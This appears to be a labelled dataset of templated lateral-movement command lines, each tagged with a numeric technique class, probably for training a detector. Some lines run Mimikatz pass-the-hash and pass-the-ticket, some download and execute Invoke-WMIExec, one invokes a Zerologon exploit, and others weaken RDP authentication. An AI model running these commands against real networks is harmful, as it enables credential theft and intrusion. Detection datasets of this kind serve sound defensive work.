5	Start-BitsTransfer -Source ${source_file_path} -Destination ${Destination_file_path}
0	rsync -avz ${source_file_path} ${media_file_path}
0	$RemovableDrives=@();$RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter "drivetype=2" | select-object -expandproperty DeviceID;ForEach ($Drive in $RemovableDrives);{;write-host "Removable Drive Found:" $Drive;New-Item -Path $Drive/T1091Test1.txt -ItemType "file" -Force -Value "T1091 Test 1 has created this file to simulate malware spread to removable drives.";}
7	cp -r ${source_file_path} ${share_file_path}
3	psexec \\${ip_address} -i -u ${username} -p ${password} ${command}
3	plink -ssh ${ip_address} -l ${username} -pw ${password}
3	sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -allowAccessFor -allUsers -privs -all -quiet
6	sendmail ${username}@${domain} < mail.txt
3	putty ${username}@${ip_address}
0	xcopy ${source_file_path} ${media_file_path} /s /e
3	termius username@hostname
5	NET USE * '#{remote_path}' /TRANSPORT:QUIC /SKIPCERTCHECK;copy '#{local_file}' '*:\'
3	mstsc /v:${ip_address} /f
6	cat email.txt | sendmail ${username}@${domain}
2	kerberos::ptt ticket.kirbi
0	xcopy ${source_file_path} ${media_file_path}
5	iwr -URI ${remote_file} -Outfile ${local_path}
6	ssmtp ${username}@${domain} < mail.txt
5	copy \\${Source_IP}\${source_file_path} \\${Destination_IP}\${Destination_file_path}
5	start "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" ${remote_file}
3	ssh ${user}@${ip}
2	sekurlsa::pth /user:${username} /Domain:${domain} /ntlm:${ntlm}
3	Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false ;Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass};Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
2	Rubeus.exe ptt /ticket:ticket.kirbi
3	psexec \\${ip_address} -i -u ${username} -p ${password} ${command} -s
0	robocopy ${source_file_path}  ${media_file_path} /e /copyall /mir
4	"%PROGRAMFILES(x86)%/#{radmin_exe}"
8	python ./cve-2020-1472-exploit.py -n ${dc_name} -t ${dc_ip}
5	scp ${local_file} ${username}@${remote_host}:${remote_path}
5	MsoHtmEd.exe ${remote_file}
3	cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
3	Enable-PSRemoting -Force;Invoke-Command -ComputerName $env:COMPUTERNAME -ScriptBlock {whoami}
6	echo ${email_content} | mutt -s ${email_subject} ${username}@${domain}
2	sekurlsa::pth /user:${username} /Domain:${domain} /ntlm:${ntlm} /run:"PsExec.exe \\${ip_address} ${process}"
5	(New-Object System.Net.WebClient).DownloadFile("${remote_file}", "${local_path}")
3	evil-winrm -i #{destination_address} -u #{user_name} -p #{password}
5	bitsadmin.exe /transfer ${bits_job_name} /Priority HIGH ${remote_file} ${local_path}
3	copy c:\windows\system32\calc.exe 'C:\users\#{user}\AppData\local\Microsoft\WindowsApps\foxprow.exe';$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","#{computer_name}"));$com.ActivateMicrosoftApp("5")
0	robocopy ${source_file_path} ${media_file_path} /e
3	putty -ssh ${ip_address} -l ${username} -pw ${password} -m script.txt
5	xcopy ${source_file_path} \\${Destination_IP}\${Destination_file_path} /Y
6	cat email.txt | mutt -s ${email_subject} ${username}@${domain}
0	Copy-Item ${source_file_path} -Destination ${media_file_path} -Recurse
7	xcopy ${source_file_path} ${share_file_path}
0	scp ${source_file_path} ${username}@${ip_address}:${media_file_path}
3	New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
5	ProtocolHandler.exe ${remote_file}
0	robocopy ${source_file_path} ${media_file_path} /e /xo
5	Invoke-WebRequest -URI ${remote_file} -Outfile ${local_path}
7	xcopy ${source_file_path} ${share_file_path} /s /e
2	[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
3	putty -ssh ${username}@${ip_address} -pw ${password} -m script.txt
7	scp ${source_file_path} ${username}@${ip_address}:${share_file_path}
7	robocopy ${source_file_path} ${share_file_path} /e /xo
3	vncviewer ${ip_address}
0	cp -r ${source_file_path} ${media_file_path}
5	scp ${username}@${remote_host}:${remote_file} ${local_path}
7	Copy-Item ${source_file_path} -Destination ${share_file_path} -Recurse
3	"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
3	cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
6	cat email.txt | mpack -s ${email_subject} ${username}@${domain}
5	xcopy ${source_file_path} \\${Destination_IP}\${Destination_file_path}
7	robocopy ${source_file_path} ${share_file_path}  /mir
7	copy ${source_file_path} ${share_file_path}
2	"#{mimikatz_exe}" "kerberos::ptt #{ticket}"
3	psexec \\${ip_address} -i ${command}
6	echo ${email_content} | mpack -s ${email_subject} ${username}@${domain}
3	xfreerdp /v:${ip_address}
5	certutil -urlcache -split -f ${remote_file} ${local_path}
6	mail -s ${email_subject} ${username}@${domain} < mail.txt
7	robocopy ${source_file_path} ${share_file_path} /e /copyall
2	Invoke-WMIExec -Target ${ip_address} -Domain ${domain} -Username ${username} -Hash ${ntlm} -Command ${command} -verbose
6	echo ${email_content} | mutt -s ${email_subject} ${username}@${domain} -a attachement.txt
3	psexec \\${ip_address} -u ${username} -p ${password} script.txt
3	sftp ${username}@{ip_address}
5	certreq.exe -Post -config ${remote_file} c:\windows\win.ini ${local_path}
3	xfreerdp /u:${username} /p:${password} /v:${ip_address}
2	#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}
5	CertReq -Post -config ${remote_destination} ${local_path}
7	pscp ${source_file_path} ${username}@${ip_address}:${share_file_path}
0	copy ${source_file_path} ${media_file_path}
0	Copy-Item ${source_file_path} -Destination ${media_file_path} -Recurse -Container
7	rsync -avz ${source_file_path} ${share_file_path}
3	Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{NEW_Remote_Port};New-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort #{NEW_Remote_Port}
5	powershell.exe iwr -URI ${remote_file} -Outfile ${local_path}
7	Copy-Item ${source_file_path} -Destination ${share_file_path}
5	New-SmbMapping -RemotePath '#{remote_path}' -TransportType QUIC -SkipCertificateCheck;copy '#{local_file}' 'Z:\'
3	reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{NEW_Remote_Port} /f;netsh advfirewall firewall add rule name="RDPPORTLatest-TCP-In" dir=in action=allow protocol=TCP localport=#{NEW_Remote_Port}
3	putty -ssh ${username}@${ip_address} -pw ${password}
3	reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /d 0 /t REG_DWORD /f
5	Copy-Item ${source_file_path} -Destination "\\${Destination_IP}\C$\${Destination_file_path}" -Recurse -Credential ${password}
3	Enable-PSRemoting -Force
5	powershell.exe Invoke-WebRequest -URI ${remote_file} -Outfile ${local_path}
2	#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}"
2	& "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -accepteula \\#{target} -w c:\ -c "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" asktgt /user:#{user_name} /password:#{password} /domain:#{domain} /outfile:ticket.kirbi;Set-Location "PathToAtomicsFolder\..\ExternalPayloads";Move-Item -Force "\\#{target}\c$\ticket.kirbi" ticket.kirbi;Write-Host "Successfully retrieved TGT from '#{target}', now requesting a TGS from local";& "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" asktgs /service:cifs/#{target} /ticket:ticket.kirbi /ptt;Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\ticket.kirbi";& "PathToAtomicsFolder\..\ExternalPayloads\rubeus.exe" purge      
3	$Server=#{logonserver};$User = Join-Path #{domain} #{username};$Password="#{password}";cmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password;mstsc /v:$Server;echo "RDP connection established"
3	[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
7	robocopy ${source_file_path}  ${share_file_path} /e /copyall /mir
0	Copy-Item ${source_file_path} -Destination ${media_file_path}
0	robocopy ${source_file_path} ${media_file_path} /e /copyall
7	robocopy ${source_file_path} ${share_file_path} /e
5	pscp ${local_path}${username}@${remote_host}:${remote_file}
6	echo ${email_content} | mail -s ${email_subject} ${username}@${domain}
6	echo ${email_content} | mpack -s ${email_subject} ${username}@${domain} -a attachement.txt
3	plink ${username}@${ip_address}
6	echo ${email_content} | sendmail ${username}@${domain}
3	SharpRDP.exe computername=${ip_address} command="${commnad}" username=${domain}\${username} password=${password}
5	xcopy ${source_file_path} \\${Destination_IP}\${Destination_file_path} /s
0	robocopy ${source_file_path} ${media_file_path}  /mir
3	putty -ssh ${ip_address} -l ${username} -pw ${password}
